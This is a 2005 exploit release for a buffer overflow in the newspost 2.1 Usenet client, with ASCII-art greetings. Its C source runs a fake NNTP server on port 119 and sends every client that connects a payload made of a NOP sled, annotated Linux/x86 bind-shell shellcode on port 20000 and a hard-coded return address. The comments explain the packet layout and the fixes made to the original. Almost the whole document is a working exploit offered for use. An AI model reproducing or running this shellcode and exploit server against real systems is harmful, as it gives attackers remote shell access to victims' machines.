
RE: SECURITY.NNOV.RU NewsPost buffer overflow [EXPLOIT]




/* 
02/03/2005 
NOTES: newspost 2.1 "socket_getline()" buffer overflow exploit.
       This program is a fake NNTP server: it listens on TCP 119 and sends
       every client that connects one 1056-byte "line" (956-byte NOP sled,
       92-byte Linux/x86 bind shell on port 20000, 4 filler bytes, return
       address 0xbfffecb8). The return address is hard-coded; it will not
       match a target with stack randomisation or a different stack layout
       and must be adjusted per target.
 
Client Usage (run on the victim; <IP> is the host running this program)
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic <file>
 
Greetz fly to my girlfriend YASMIN H. 
 
                                                    ? 
                                                   ?M 
                   M                              
?MMM 
                   MMm                           
?MMMM 
                   M$$MMm                       
?MMMMM. 
                   MM$$MMMMm                   
MMMMMMMM 
                   `MM$$MMMMMMm               4MMMM$
$MM 
                    MMM$$MMMMMMMMm           ?MMMM$
$MMM 
                     MMM$$$MMMMMMMMm         mMMMM
$MMMM 
                      `MMM$$$MMMMMMMm        MMMM
$MMMM? 
                        MMMM$$$MMMMMMMm      MMM$
$MMM? 
                         `MMMMMMMMMMMMMm     MMMMMMM? 
                           `MMMMMMMMMMMMMm   MMMMMM 
                              `MMMMMMMMMMMM  MMMMM 
                                 `MMMMMMMMMM MMMMM 
                                    `MMMMMMMMMMMM 
                                      MMMMMMMMMMM 
                               mmMMMMMMMMMMMMMMMMM 
                           mmMMMMMMMMMMMMMMMMMMMMMM 
                          ?MMM#MMMMMMMMMMMMMMMMMMMMm 
                        4MMM<º >MMMMMMMMMMMMMMMMMMMM 
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM 
                      4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                        MMMMMMMMMMMMMMMMMMMMMMMMMMMM 
       ?Mn               ?MMMMMMMMMMMMMMMMMMMMMMMMM            
?Mnn 
       nM                  `MMMMMMMMMMMMMMMMMMMMMM?              
n? 
        `?                    MMMMMMMMMMMMMMMMM?                
n? 
                                     MMMMMM? 
                                    mtr? 
 
 
     mMMM           nmM                         mM 
   mM??  M          ' M                          n 
 mM$                 nM                       n?MMn?Ä 
4M               m   ?M                      N   ?                           
?` 
m?       `n?    mM  NM?                         NM 
mM        mMm  nm   M??MÄ?     n?Mm   ?n  xnÄ,  ?   
?n  xnÄ  ?Mm   Mn n?     nM   nMm 
 mM        `mMM?   nM     M   nM  ,`   ?n?  y   M    
?n?  y nM  ?   nM  Ä    Ä   ? 
  M?         M'    ?Ä      M  n.,?     nm      nM    
nM     n   M   ?   Ä    ?  n 
   MM?  mM   M    nM Ä    M?  n    ,  nM       ?Ä   
nM      M  nM   M   M   M?  M   n 
     MMM?   M?   nM   MÄÄM     n?nN  ?M       nM   ?M       
`?M?   ??  .N  nM    ?nM? 
           M? 
         n?                                              
cybertronic 2oo5 
        ?                                        
________________ 
                                                    ----------------------/ 
 
 
 
                MMMMMMMMm                            
mMMMMMMM? 
             ?MM$MMMMMMMMMm                        
mMMMMMMMMM$MM` 
             MMMMMMMMMMMMMMMm                    
mMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMM                
MMMMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMMMM            
MMMMMMMMMMMMMMMMMMMM 
               `MMMMMMMMMMMMMMMMMM          
MMMMMMMMMMM(c)MMMM? 
 
                ºÕÍÄúú  just want to say love you 
dad!  úúÄÍÕº 
*/ 
 
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
 
/* ANSI SGR escapes for the coloured status output: colour + bold, and reset.
 * "\E" as an escape for ESC (0x1b) is a GNU C extension, not ISO C. */
#define RED     "\E[31m\E[1m"
#define GREEN   "\E[32m\E[1m"
#define YELLOW  "\E[33m\E[1m"
#define BLUE    "\E[34m\E[1m"
#define NORMAL  "\E[m"

#define PORT    119     /* NNTP; the victim newspost client connects here */
#define BACKLOG 5       /* listen() queue depth */
 
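/*
 * 92-byte Linux/x86 bind shell on TCP port 20000 (the comments are the
 * original disassembly, re-joined onto their byte strings: in the archived
 * listing the operands had wrapped onto their own lines, outside the "//"
 * comment, so the file did not compile as shown).
 *
 * All socket work goes through the socketcall multiplexer (eax = 102) with
 * ebx selecting socket(1) / bind(2) / listen(4) / accept(5).  The accepted
 * fd is dup2()'d (63) over fds 4..0 and execve (11, built as ~244 so no
 * 0x0b literal is needed) runs "//bin/sh".  Port 20000 is pushed as the
 * network-order word 0x4e20 (little-endian immediate 0x204e = 8270).
 *
 * The string holds no 0x00 byte, so strlen() sees all 92 bytes;
 * sizeof(scode) is 93 because of the implicit terminating NUL.
 */
char scode[] =
"\x31\xdb"                              // xor     ebx, ebx
"\xf7\xe3"                              // mul     ebx           -> eax = edx = 0
"\xb0\x66"                              // mov     al, 102       (socketcall)
"\x53"                                  // push    ebx           (protocol 0)
"\x43"                                  // inc     ebx
"\x53"                                  // push    ebx           (SOCK_STREAM)
"\x43"                                  // inc     ebx
"\x53"                                  // push    ebx           (AF_INET)
"\x89\xe1"                              // mov     ecx, esp
"\x4b"                                  // dec     ebx           (SYS_SOCKET = 1)
"\xcd\x80"                              // int     80h
"\x89\xc7"                              // mov     edi, eax      (listening fd)
"\x52"                                  // push    edx           (INADDR_ANY)
"\x66\x68\x4e\x20"                      // push    word 8270     (port 20000, network order)
"\x43"                                  // inc     ebx
"\x66\x53"                              // push    bx            (AF_INET)
"\x89\xe1"                              // mov     ecx, esp      (&sockaddr_in)
"\xb0\xef"                              // mov     al, 239
"\xf6\xd0"                              // not     al            -> 16 = sizeof(sockaddr_in)
"\x50"                                  // push    eax
"\x51"                                  // push    ecx
"\x57"                                  // push    edi
"\x89\xe1"                              // mov     ecx, esp
"\xb0\x66"                              // mov     al, 102
"\xcd\x80"                              // int     80h           (SYS_BIND = 2)
"\xb0\x66"                              // mov     al, 102
"\x43"                                  // inc     ebx
"\x43"                                  // inc     ebx
"\xcd\x80"                              // int     80h           (SYS_LISTEN = 4)
"\x50"                                  // push    eax
"\x50"                                  // push    eax
"\x57"                                  // push    edi
"\x89\xe1"                              // mov     ecx, esp
"\x43"                                  // inc     ebx
"\xb0\x66"                              // mov     al, 102
"\xcd\x80"                              // int     80h           (SYS_ACCEPT = 5)
"\x89\xd9"                              // mov     ecx, ebx      (loop counter = 5)
"\x89\xc3"                              // mov     ebx, eax      (accepted fd)
"\xb0\x3f"                              // lp: mov al, 63        (dup2)
"\x49"                                  // dec     ecx
"\xcd\x80"                              // int     80h           dup2(fd, ecx)
"\x41"                                  // inc     ecx
"\xe2\xf8"                              // loop    lp            fds 4, 3, 2, 1, 0
"\x51"                                  // push    ecx           (string terminator, ecx = 0)
"\x68\x6e\x2f\x73\x68"                  // push    dword 68732f6eh  "n/sh"
"\x68\x2f\x2f\x62\x69"                  // push    dword 69622f2fh  "//bi"
"\x89\xe3"                              // mov     ebx, esp      ("//bin/sh")
"\x51"                                  // push    ecx           (argv[1] = NULL)
"\x53"                                  // push    ebx           (argv[0])
"\x89\xe1"                              // mov     ecx, esp      (argv; edx = envp = NULL)
"\xb0\xf4"                              // mov     al, 244
"\xf6\xd0"                              // not     al            -> 11 = execve
"\xcd\x80";                             // int     80h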
 
void cmd ( int connfd ); 
void header (); 
 
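/*
 * Entry point: run a fake NNTP server on PORT and hand every accepted
 * connection to a forked child that calls cmd() to send the overflow line.
 *
 * argc/argv are unused; the port and payload are compile-time constants.
 * Exits with 1 on any socket setup failure (socket, bind, listen, accept).
 *
 * Fixes relative to the original: bind() is now checked (it was ignored,
 * so a failed bind on the privileged port 119 left the program listening
 * on an ephemeral port the client would never reach); the child exits
 * after cmd() instead of falling back into the accept() loop on a closed
 * listener; stdout is flushed before fork() so buffered status lines are
 * not duplicated by the child; SO_REUSEADDR allows an immediate restart;
 * SIGCHLD is ignored so finished children do not linger as zombies.
 */
int
main ( int argc, char* argv[] )
{
        int listenfd, connfd;
        int on = 1;
        pid_t childpid;
        socklen_t clilen;
        struct sockaddr_in cliaddr, servaddr;

        (void) argc;
        (void) argv;

        header ();

        /* children are fire-and-forget: reap them automatically */
        signal ( SIGCHLD, SIG_IGN );

        printf ( "[*] Creating socket..." );
        listenfd = socket ( AF_INET, SOCK_STREAM, 0 );
        if ( listenfd == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );

        /* let a restart bind while the previous socket sits in TIME_WAIT */
        setsockopt ( listenfd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof ( on ) );

        memset ( &servaddr, 0, sizeof ( servaddr ) );
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
        servaddr.sin_port = htons ( PORT );

        /* PORT (119) is below 1024, so this normally needs root or
         * CAP_NET_BIND_SERVICE on Linux; fail loudly instead of silently
         * listening on whatever port the kernel picked */
        printf ( "[*] Binding port %d...", PORT );
        if ( bind ( listenfd, ( struct sockaddr * ) &servaddr,
                    sizeof ( servaddr ) ) == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                close ( listenfd );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );

        printf ( "[*] Listening..." );
        if ( listen ( listenfd, BACKLOG ) == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                close ( listenfd );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );

        for ( ; ; )
        {
                clilen = sizeof ( cliaddr );
                connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
                                  &clilen );
                if ( connfd < 0 )
                {
                        close ( listenfd );
                        exit ( 1 );
                }

                /* do not let the child inherit unflushed stdout data */
                fflush ( stdout );

                childpid = fork ( );
                if ( childpid == 0 )
                {
                        /* child: the listener belongs to the parent */
                        close ( listenfd );
                        printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL,
                                 inet_ntoa ( cliaddr.sin_addr ) );
                        cmd ( connfd );
                        close ( connfd );
                        exit ( 0 );
                }
                if ( childpid == -1 )
                {
                        printf ( RED "[*] fork() failed, dropping connection\n" NORMAL );
                }

                /* parent: the child owns the connection from here on */
                close ( connfd );
        }

        return 0;
}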
 
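/*
 * Assemble the overflow line and write it to the connected client socket.
 *
 * Packet layout, 1056 bytes, no trailing newline:
 *   [   0 ..  955]  956 x 0x90 NOP sled
 *   [ 956 .. 1047]  scode, 92 bytes (its string NUL is not sent)
 *   [1048 .. 1051]  "AAAA" filler
 *   [1052 .. 1055]  return address 0xbfffecb8, little-endian
 *
 * The return address is a hard-coded stack address presumed to land inside
 * the target's copy of the NOP sled; on a target with stack randomisation,
 * a different environment size or a different build it will not, and the
 * client just crashes.
 *
 * The original built the packet with strcat()/strncat() and sized it with
 * strlen(), which silently truncates it if scode or the address ever
 * contains a 0x00 byte; explicit lengths are used here instead, and the
 * address is serialised byte by byte so the host's endianness does not
 * matter (the target is x86).  Short writes are retried; on a write error
 * the process prints FAILED and exits with 1, as before.
 *
 * s: connected socket (the accepted fd; the caller owns and closes it).
 */
void
cmd ( int s )
{
        enum { SLED_LEN = 956, FILLER_LEN = 4, ADDR_LEN = 4, OUT_MAX = 1200 };
        const unsigned long ret = 0xbfffecb8UL;
        const size_t code_len = sizeof ( scode ) - 1;   /* drop the string NUL */
        char out[OUT_MAX];
        size_t len = 0, sent = 0;
        ssize_t n;

        if ( SLED_LEN + code_len + FILLER_LEN + ADDR_LEN > sizeof ( out ) )
        {
                printf ( RED "[*] payload does not fit in %u bytes\n" NORMAL,
                         ( unsigned ) sizeof ( out ) );
                exit ( 1 );
        }

        memset ( out, 0x90, SLED_LEN );
        len = SLED_LEN;
        memcpy ( out + len, scode, code_len );
        len += code_len;
        memcpy ( out + len, "\x41\x41\x41\x41", FILLER_LEN );
        len += FILLER_LEN;
        out[len++] = ( char ) ( ret & 0xff );
        out[len++] = ( char ) ( ( ret >> 8 ) & 0xff );
        out[len++] = ( char ) ( ( ret >> 16 ) & 0xff );
        out[len++] = ( char ) ( ( ret >> 24 ) & 0xff );

        printf ( "[*] Sending Bad Packet [ %zu bytes ]...", len );
        while ( sent < len )
        {
                n = write ( s, out + sent, len - sent );
                if ( n <= 0 )
                {
                        printf ( RED "FAILED!\n" NORMAL );
                        exit ( 1 );
                }
                sent += ( size_t ) n;
        }
        printf ( GREEN "OK!\n" NORMAL );

        /* give the client a moment to read before the caller closes the socket */
        sleep ( 1 );
}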
 
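/*
 * Clear the screen and print the coloured "CYBERTRONIC" banner, the
 * author line and the tool name.  Purely cosmetic.
 *
 * The original called system("clear"), which spawns /bin/sh and resolves
 * "clear" through PATH for no benefit (CERT ENV33-C); the ANSI
 * "cursor home + erase display" sequence gives the same result on the
 * terminals the colour macros already assume.  The banner rows below are
 * the original literals re-joined (the archive had wrapped several of
 * them mid-string).
 */
void
header ( void )
{
        static const char *const banner[] = {
                RED "### " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  " GREEN "### " YELLOW "###  " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" NORMAL,
                RED "#   " GREEN "# # " YELLOW "#  # " BLUE "#   " RED "#  # " GREEN " #  " YELLOW "#  # " BLUE "# # " RED "##  # " GREEN "# " YELLOW "#  \n" NORMAL,
                RED "#   " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  " GREEN " #  " YELLOW "###  " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#  \n" NORMAL,
                RED "#   " GREEN " #  " YELLOW "#  # " BLUE "#   " RED "# #  " GREEN " #  " YELLOW "# #  " BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#  \n" NORMAL,
                RED "### " GREEN " #  " YELLOW "###  " BLUE "### " RED "#  # " GREEN " #  " YELLOW "#  # " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" NORMAL,
                RED "                cybertronic@xxxxxxx\n" NORMAL,
                RED "                  ----------(c) 2005----------\n\n" NORMAL,
                "newspost-2.1\n\n",
        };
        size_t i;

        /* ESC[H ESC[2J: cursor home, erase whole display */
        fputs ( "\033[H\033[2J", stdout );
        for ( i = 0; i < sizeof ( banner ) / sizeof ( banner[0] ); i++ )
        {
                fputs ( banner[i], stdout );
        }
}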